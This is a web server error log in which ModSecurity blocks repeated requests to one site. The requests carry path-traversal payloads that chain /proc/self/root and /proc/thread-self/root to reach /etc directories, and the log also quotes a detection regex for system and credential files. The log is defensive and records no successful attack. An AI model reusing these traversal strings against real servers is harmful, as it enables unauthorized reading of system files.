[Mon Mar 16 14:26:32.663949 2026] [:error] [pid 14895:tid 140411557287680] [client 74.7.243.203:46952] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/bash_completion.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9SFajLEzk2WiQ-10bfQAAApY"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:26:36.738261 2026] [:error] [pid 21805:tid 140411565680384] [client 74.7.241.46:59254] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9TLABkC4fWIHEf8H4cwAAAFU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Mon Mar 16 14:26:44.440425 2026] [:error] [pid 21533:tid 140411607643904] [client 74.7.243.203:39846] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modules-load.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9VHjZBu2q05ozVU9iLAAAAVA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:26:46.492519 2026] [:error] [pid 21805:tid 140411632822016] [client 74.7.241.46:56350] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/modprobe.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9VrABkC4fWIHEf8H4gAAAAE0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:26:50.083752 2026] [:error] [pid 10651:tid 140411683178240] [client 74.7.241.46:33210] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/popt.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9WrysWC90G-1nBrBNbAAAAYc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:27:08.516053 2026] [:error] [pid 14895:tid 140411683178240] [client 74.7.228.16:42656] [client 74.7.228.16] ModSecurity: Access denied with code 403 (phase 2). Matched phrase "oBot" at REQUEST_HEADERS:user-agent. [file "/etc/modsecurity/locaweb-rules/activated_rules/Locaweb_99_useragent.conf"] [line "4"] [id "358801"] [msg "BAD BOT - Detected and Blocked."] [hostname "bandeirantesbombas.com.br"] [uri "/robots.txt"] [unique_id "abg9bFajLEzk2WiQ-10bmAAAAoc"]
[Mon Mar 16 14:27:16.962933 2026] [:error] [pid 10831:tid 140411540502272] [client 74.7.243.203:38792] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9dI6lpbStxTqkSkt1hAAAAlg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:27:29.619160 2026] [:error] [pid 10651:tid 140411540502272] [client 74.7.241.46:33196] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/dhcp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9gbysWC90G-1nBrBNjQAAAZg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Mon Mar 16 14:27:36.016635 2026] [:error] [pid 15061:tid 140411725141760] [client 74.7.243.203:36428] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9iKTCbgAP5jq5Teg0gwAAAsI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:27:37.363335 2026] [:error] [pid 15061:tid 140411632822016] [client 74.7.243.203:38978] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9iaTCbgAP5jq5Teg0hAAAAs0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:07.271767 2026] [:error] [pid 15061:tid 140411649607424] [client 74.7.243.203:38982] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9p6TCbgAP5jq5Teg0pAAAAss"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:09.570962 2026] [:error] [pid 21805:tid 140411574073088] [client 74.7.243.203:33450] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pam.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9qbABkC4fWIHEf8H4iQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:11.888790 2026] [:error] [pid 21805:tid 140411699963648] [client 74.7.243.203:45866] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/pki"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9q7ABkC4fWIHEf8H4iwAAAEU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:13.245019 2026] [:error] [pid 10831:tid 140411582465792] [client 74.7.243.203:45882] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/statetab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9rY6lpbStxTqkSkt1iAAAAlM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:20.443730 2026] [:error] [pid 14895:tid 140411548894976] [client 74.7.243.203:45898] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9tFajLEzk2WiQ-10bogAAApc"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:22.811971 2026] [:error] [pid 10772:tid 140411607643904] [client 74.7.243.203:57548] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9tv9ocpUE4ed4uDz40wAAAhA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:25.179910 2026] [:error] [pid 21805:tid 140411716749056] [client 74.7.243.203:57560] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9ubABkC4fWIHEf8H4jQAAAEM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:37.999678 2026] [:error] [pid 10772:tid 140411658000128] [client 74.7.243.203:57566] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/rc.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9xf9ocpUE4ed4uDz43gAAAgo"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:40.314165 2026] [:error] [pid 15061:tid 140411716749056] [client 74.7.243.203:37530] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9yKTCbgAP5jq5Teg0qAAAAsM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:41.633962 2026] [:error] [pid 10651:tid 140411624429312] [client 74.7.243.203:43590] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/depmod.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg9ybysWC90G-1nBrBNkgAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:49.347419 2026] [:error] [pid 10831:tid 140411632822016] [client 74.7.243.203:43602] [client 74.7.243.203] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc/zabbix"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg90Y6lpbStxTqkSkt1kAAAAk0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/proc/thread-self/root/etc
[Mon Mar 16 14:28:50.649580 2026] [:error] [pid 21533:tid 140411725141760] [client 74.7.241.46:59328] [client 74.7.241.46] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc/dracut.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abg90njZBu2q05ozVU9ieQAAAUI"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/self/root/proc/self/root/etc
